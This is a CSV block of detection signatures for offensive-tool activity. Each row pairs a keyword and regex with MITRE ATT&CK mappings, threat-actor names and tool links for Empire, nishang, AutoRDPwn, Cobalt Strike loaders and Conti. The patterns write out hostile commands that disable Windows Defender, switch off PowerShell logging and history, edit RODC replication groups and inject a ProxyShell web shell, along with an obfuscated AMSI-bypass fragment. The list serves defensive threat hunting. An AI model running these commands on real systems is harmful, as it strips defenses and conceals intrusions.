"*Set-Content -Path psexec.exe*",".{0,1000}Set\-Content\s\-Path\spsexec\.exe.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","0","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","58611"
"*Set-Content -Path server.exe*",".{0,1000}Set\-Content\s\-Path\sserver\.exe.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","0","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","58612"
"*Set-Content -Path SharpRDP.exe*",".{0,1000}Set\-Content\s\-Path\sSharpRDP\.exe.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","0","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","58613"
"*Set-Content -Path SharpWeb.exe*",".{0,1000}Set\-Content\s\-Path\sSharpWeb\.exe.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","0","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","58614"
"*Set-DCShadowPermissions*",".{0,1000}Set\-DCShadowPermissions.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","DCShadow is an attack that masks certain actions by temporarily imitating a Domain Controller. If you have Domain Admin or Enterprise Admin privileges in a root domain it can be used for forest-level persistence.","T1550 - T1555 - T1212 - T1558","N/A","N/A","Black Basta","Exploitation tool","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","58615"
"*Set-DCShadowPermissions*",".{0,1000}Set\-DCShadowPermissions.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","58616"
"*Set-DCShadowPermissions*",".{0,1000}Set\-DCShadowPermissions.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","58617"
"*setdes linux x64 blahblahblah*",".{0,1000}setdes\slinux\sx64\sblahblahblah.{0,1000}","offensive_tool_keyword","venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","#content","N/A","10","10","2070","357","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z","58618"
"*Set-DesktopACLToAllow*",".{0,1000}Set\-DesktopACLToAllow.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","58619"
"*Set-DesktopACLToAllowEveryone*",".{0,1000}Set\-DesktopACLToAllowEveryone.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","58620"
"*Set-DomainObject -Identity 'CN=Allowed RODC Password Replication Group* -Set @{'member'=@(*",".{0,1000}Set\-DomainObject\s\-Identity\s\'CN\=Allowed\sRODC\sPassword\sReplication\sGroup.{0,1000}\s\-Set\s\@\{\'member\'\=\@\(.{0,1000}","offensive_tool_keyword","SharpRODC","audit the security of read-only domain controllers","T1012 - T1482 - T1207 - T1208 - T1209 - T1212","TA0007 - TA0008 - TA0006","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpRODC","1","0","N/A","N/A","8","2","115","8","2023-11-27T12:41:52Z","2023-11-24T14:35:49Z","58621"
"*Set-DomainObject -Identity 'CN=Denied RODC Password Replication Group* -Clear 'member'*",".{0,1000}Set\-DomainObject\s\-Identity\s\'CN\=Denied\sRODC\sPassword\sReplication\sGroup.{0,1000}\s\-Clear\s\'member\'.{0,1000}","offensive_tool_keyword","SharpRODC","audit the security of read-only domain controllers","T1012 - T1482 - T1207 - T1208 - T1209 - T1212","TA0007 - TA0008 - TA0006","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpRODC","1","0","N/A","N/A","8","2","115","8","2023-11-27T12:41:52Z","2023-11-24T14:35:49Z","58622"
"*Set-DomainObject -Identity 'CN=RODC* -Set @{'msDS-NeverRevealGroup'=@(*",".{0,1000}Set\-DomainObject\s\-Identity\s\'CN\=RODC.{0,1000}\s\-Set\s\@\{\'msDS\-NeverRevealGroup\'\=\@\(.{0,1000}","offensive_tool_keyword","SharpRODC","audit the security of read-only domain controllers","T1012 - T1482 - T1207 - T1208 - T1209 - T1212","TA0007 - TA0008 - TA0006","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpRODC","1","0","N/A","N/A","8","2","115","8","2023-11-27T12:41:52Z","2023-11-24T14:35:49Z","58623"
"*Set-DomainObject*",".{0,1000}Set\-DomainObject.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Targeted kerberoasting by setting SPN","T1110","TA0006","N/A","Black Basta","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","58624"
"*Set-EtwTraceProvider -Guid '{A0C1853B-5C40-4B15-8766-3CF1C58F985A}' -AutologgerName 'EventLog-Application' -Property 0x11*",".{0,1000}Set\-EtwTraceProvider\s\-Guid\s\'\{A0C1853B\-5C40\-4B15\-8766\-3CF1C58F985A\}\'\s\-AutologgerName\s\'EventLog\-Application\'\s\-Property\s0x11.{0,1000}","offensive_tool_keyword","Set-EtwTraceProvider","disables Microsoft-Windows-PowerShell event logging","T1070.001","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","58625"
"*Seth by SySS GmbH*",".{0,1000}Seth\sby\sSySS\sGmbH.{0,1000}","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","0","N/A","N/A","9","10","1423","323","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z","58628"
"*seth.py * -j INJECT*",".{0,1000}seth\.py\s.{0,1000}\s\-j\sINJECT.{0,1000}","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","0","N/A","N/A","9","10","1423","323","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z","58629"
"*Seth-master.zip*",".{0,1000}Seth\-master\.zip.{0,1000}","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","1","N/A","N/A","9","10","1423","323","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z","58630"
"*SetInitialCheckIn updates the time stamp that the Agent first successfully connected to the Merlin server*",".{0,1000}SetInitialCheckIn\supdates\sthe\stime\sstamp\sthat\sthe\sAgent\sfirst\ssuccessfully\sconnected\sto\sthe\sMerlin\sserver.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","58631"
"*sET-ItEM ( 'V'+'aR' +  'IA' + 'blE:1q2'  + 'uZx'*",".{0,1000}sET\-ItEM\s\(\s\'V\'\+\'aR\'\s\+\s\s\'IA\'\s\+\s\'blE\:1q2\'\s\s\+\s\'uZx\'.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","PowerShell AMSI Bypass Obfuscation example for copy-paste purposes","T1558.001 - T1078.002 - T1550.003","TA0008 - TA0009 - TA0003","N/A","Black Basta","Defense Evasion","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","58632"
"*Set-ItemProperty * ""EnableModuleLogging"" -Value 0*",".{0,1000}Set\-ItemProperty\s.{0,1000}\s\""EnableModuleLogging\""\s\-Value\s0.{0,1000}","offensive_tool_keyword","powershell","disable powershell logging","T1484.001 - T1112 - T1491.001 - T1490 - T1036.001 - T1089","TA0005 - TA0043","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","58633"
"*Set-ItemProperty * ""EnableScriptBlockLogging"" -Value 0*",".{0,1000}Set\-ItemProperty\s.{0,1000}\s\""EnableScriptBlockLogging\""\s\-Value\s0.{0,1000}","offensive_tool_keyword","powershell","disable powershell logging","T1484.001 - T1112 - T1491.001 - T1490 - T1036.001 - T1089","TA0005 - TA0043","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","58634"
"*Set-ItemProperty -Path ""HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging"" -Name ""EnableModuleLogging"" -Value 0*",".{0,1000}Set\-ItemProperty\s\-Path\s\""HKLM\:\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ModuleLogging\""\s\-Name\s\""EnableModuleLogging\""\s\-Value\s0.{0,1000}","offensive_tool_keyword","powershell","disable powershell logging","T1484.001 - T1112 - T1491.001 - T1490 - T1036.001 - T1089","TA0005 - TA0043","N/A","N/A","Defense Evasion","N/A","1","0","#registry","N/A","10","10","N/A","N/A","N/A","N/A","58636"
"*set-killdate *",".{0,1000}set\-killdate\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","58638"
"*Set-Killdate*",".{0,1000}Set\-Killdate.{0,1000}","offensive_tool_keyword","empire","empire function name of agent.ps1. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1049","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","58639"
"*setLoaderFlagZero*",".{0,1000}setLoaderFlagZero.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/BokuLoader","1","1","N/A","N/A","10","10","1312","255","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z","58640"
"*Set-MacAttribute.ps1*",".{0,1000}Set\-MacAttribute\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1088","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","58641"
"*Set-MacroSecurityOff *",".{0,1000}Set\-MacroSecurityOff\s.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tool","https://github.com/gustanini/PowershellTools","1","0","N/A","N/A","10","1","76","13","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z","58642"
"*Set-MacroSecurityOff.ps1*",".{0,1000}Set\-MacroSecurityOff\.ps1.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tool","https://github.com/gustanini/PowershellTools","1","1","N/A","N/A","10","1","76","13","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z","58643"
"*Set-MasterBootRecord *",".{0,1000}Set\-MasterBootRecord\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","58644"
"*Set-MpPreference -DisableRealtimeMonitoring *true*",".{0,1000}Set\-MpPreference\s\-DisableRealtimeMonitoring\s.{0,1000}true.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider - Black Basta","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","58648"
"*Set-MpPreference -ExclusionPath * -DisableRealtimeMonitoring*",".{0,1000}Set\-MpPreference\s\-ExclusionPath\s.{0,1000}\s\-DisableRealtimeMonitoring.{0,1000}","offensive_tool_keyword","powershell","Windows Defender evasion add an exclusion directory for your shady stuff","T1105 - T1203 - T1221 - T1027 - T1036","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","https://github.com/alperenugurlu/AD_Enumeration_Hunt/blob/alperen_ugurlu_hack/AD_Enumeration_Hunt.ps1","10","10","N/A","N/A","N/A","N/A","58651"
"*Set-MpPreference -PUAProtection disable*",".{0,1000}Set\-MpPreference\s\-PUAProtection\sdisable.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection  - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","58652"
"*Set-OabVirtualDirectory -ExternalUrl 'http*://*function Page_Load(){*}</script>*",".{0,1000}Set\-OabVirtualDirectory\s\-ExternalUrl\s\'http.{0,1000}\:\/\/.{0,1000}function\sPage_Load\(\)\{.{0,1000}\}\<\/script\>.{0,1000}","offensive_tool_keyword","ProxyShell","Microsoft Exchange Servers exploits - ProxyLogon and ProxyShell  CVE-2021-27065 CVE-2021-34473 CVE-2021-34523 CVE-2021-31207","T1210.003 - T1190 - T1059.003 - T1059.001 - T1059.005 - T1505","TA0001 - TA0002 - TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://www.cert.ssi.gouv.fr/uploads/ANSSI_TLPWHITE_ProxyShell_ProxyLogon_Sigma_yml.txt","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","58653"
"*setoolkit *",".{0,1000}setoolkit\s.{0,1000}","offensive_tool_keyword","social-engineer-toolkit","The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec","T1566 - T1598","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tool","https://github.com/trustedsec/social-engineer-toolkit","1","0","N/A","N/A","N/A","10","11798","2922","2024-10-21T15:46:18Z","2012-12-31T22:01:33Z","58654"
"*Set-PodeWebSocial -Type *",".{0,1000}Set\-PodeWebSocial\s\-Type\s.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100  - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","0","N/A","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","58656"
"*SetProcessInjection*encryptor.py*",".{0,1000}SetProcessInjection.{0,1000}encryptor\.py.{0,1000}","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","0","N/A","N/A","9","2","151","27","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z","58657"
"*SetProcessInjection-main*",".{0,1000}SetProcessInjection\-main.{0,1000}","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","1","N/A","N/A","9","2","151","27","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z","58658"
"*Set-PSReadlineOption -HistorySaveStyle SaveNothing*",".{0,1000}Set\-PSReadlineOption\s\-HistorySaveStyle\sSaveNothing.{0,1000}","offensive_tool_keyword","powershell","removing powershell console logging to avoid detection","T1070.004 - T1086 - T1562.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","58659"
